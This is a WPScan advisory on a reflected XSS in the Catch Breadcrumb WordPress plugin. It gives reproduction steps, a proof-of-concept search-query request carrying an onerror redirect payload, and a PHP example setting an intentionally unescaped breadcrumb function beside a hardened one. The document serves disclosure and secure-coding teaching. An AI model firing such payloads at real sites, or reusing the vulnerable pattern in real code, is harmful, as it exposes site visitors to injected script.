WPVDB-ID: DCBBB4FB-DCEC-4288-88F1-ABB5383D1B80

Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS

Published: 2020-04-22 00:00:00
Reporter: ΞX.MI
Source: wpscan.com

EPSS: 0.001 (Low), Percentile: 48.0%

=== [ DESCRIPTION - REFLECTED XSS ] ========================================
# The Catch Breadcrumb 1.5.4 plugin for WordPress allows Reflected XSS via a search query when used with one of the themes from the same author: Alchemist & Alchemist PRO, Izabel & Izabel PRO, Chique & Chique PRO, Clean Enterprise & Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, Higher Education PRO.

=== [ AFFECTED CATCH THEMES ] ==============================================
# 00 - ALCHEMIST & ALCHEMIST PRO [ https://catchthemes.com/demo/alchemist/ ]
# 01 - IZABEL & IZABEL PRO [ https://catchthemes.com/demo/izabel/ ]
# 02 - CHIQUE & CHIQUE PRO [ https://catchthemes.com/demo/chique/ ]
# 03 - CLEAN ENTERPRISE & CLEAN ENTERPRISE PRO [ https://catchthemes.com/demo/clean-enterprise/ ]
# 04 - BOLD PHOTOGRAPHY PRO [ https://catchthemes.com/demo/bold-photography/ ]
# 05 - INTUITIVE PRO [ https://catchthemes.com/demo/intuitive/ ]
# 06 - DEVOTEPRESS PRO [ https://catchthemes.com/demo/devotepress/ ]
# 07 - CLEAN BLOCKS PRO [ https://catchthemes.com/demo/clean-blocks/ ]
# 08 - FOODOHOLIC PRO [ https://catchthemes.com/demo/foodoholic/ ]
# 09 - CATCH MAG PRO [ https://catchthemes.com/demo/catch-mag/ ]
# 10 - CATCH WEDDING PRO [ https://catchthemes.com/themes/catch-wedding-pro/ ]
# 11 - HIGHER EDUCATION PRO [ https://catchthemes.com/themes/higher-education-pro/ ]

Edit (WPScanTeam):
April 22nd, 2020 - Escalated to WP Plugins Team. Plugin Closed.
April 23rd to 25th, 2020 - Various versions released, to add validation and sanitisation.

PoC

=== [ STEPS TO REPRODUCE ] =================================================
# 00 - Install & activate any of the affected themes;
# 01 - Download the Catch Breadcrumb plugin from https://downloads.wordpress.org/plugin/catch-breadcrumb.zip or install it directly from the WordPress admin dashboard;
# 02 - Activate the plugin;
# 03 - Go to the website;
# 04 - Use your XSS payload in a search query, e.g.: /?s=

=== [ PROOF-OF-CONCEPT ] ===================================================
GET /?s=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fprofiles.wordpress.org%2Fexmi%2F%60%3B%3E HTTP/1.1
Host: target.com

Note: If the payload is not triggered (this can happen if the plugin was installed before the theme, for example), go to the plugin settings (/wp-admin/admin.php?page=catch-breadcrumb) and click the ‘Save Changes’ button.
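The defect class behind this advisory, and the two halves of the fix the WPScanTeam note refers to (validation on input, escaping on output), as an added example. This is plain PHP written for this page, not the Catch Breadcrumb plugin's code: the function names, the sample input and the length limit are assumptions, and htmlspecialchars() stands in for WordPress's esc_html() so the file runs without WordPress. The breadcrumb "current item" for a search page, which normally repeats the search term, is the kind of template position where this defect appears.

```php
<?php
// Added illustration of the reflected-XSS class in the advisory above; not the
// Catch Breadcrumb plugin's code. Plain PHP so it runs without WordPress:
// htmlspecialchars() plays the role of esc_html(), and the $search_term
// argument stands in for the raw 's' query parameter.

/**
 * Vulnerable pattern (assumed shape, not the plugin's source): the search term
 * is concatenated into the breadcrumb HTML unchanged, so any markup carried in
 * ?s= is handed to the browser as markup and rendered.
 */
function breadcrumb_current_vulnerable( string $search_term ): string {
    return '<span class="breadcrumb-current">Search results for: '
        . $search_term . '</span>';
}

/**
 * Hardened pattern: the term is escaped at the exact point where it is placed
 * into HTML text. ENT_QUOTES also neutralises both quote characters, so the
 * same escaping is safe inside a double-quoted attribute value.
 */
function breadcrumb_current_hardened( string $search_term ): string {
    $safe = htmlspecialchars(
        $search_term,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<span class="breadcrumb-current">Search results for: '
        . $safe . '</span>';
}

/**
 * Input-side check, the "validation" half of the fix: reject search terms that
 * are unreasonably long (200 bytes is an assumed limit) or that contain
 * control characters, before they reach the template. This narrows what gets
 * stored or logged; it does not replace output escaping, which is the part
 * that actually prevents the XSS.
 */
function is_acceptable_search_term( string $search_term ): bool {
    return strlen( $search_term ) <= 200
        && preg_match( '/[\x00-\x08\x0B\x0C\x0E-\x1F]/', $search_term ) !== 1;
}

// Constructed sample input: a search term carrying HTML markup, the shape of
// value the report's ?s= parameter delivers.
$sample = '<b>injected markup</b>';

echo 'vulnerable: ' . breadcrumb_current_vulnerable( $sample ) . PHP_EOL;
echo 'hardened:   ' . breadcrumb_current_hardened( $sample ) . PHP_EOL;
echo 'acceptable: ' . ( is_acceptable_search_term( $sample ) ? 'yes' : 'no' ) . PHP_EOL;
```

Run with php on the command line: the vulnerable line reproduces the <b> tags verbatim, the hardened line shows them as &lt;b&gt; entities. In a WordPress theme the same split applies: read the term with get_search_query() (or sanitize_text_field() on the raw query var) and wrap every echo of it in esc_html() or esc_attr() depending on whether it lands in element text or an attribute.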

CPE Name           Operator   Version
catch-breadcrumb   lt         1.5.7

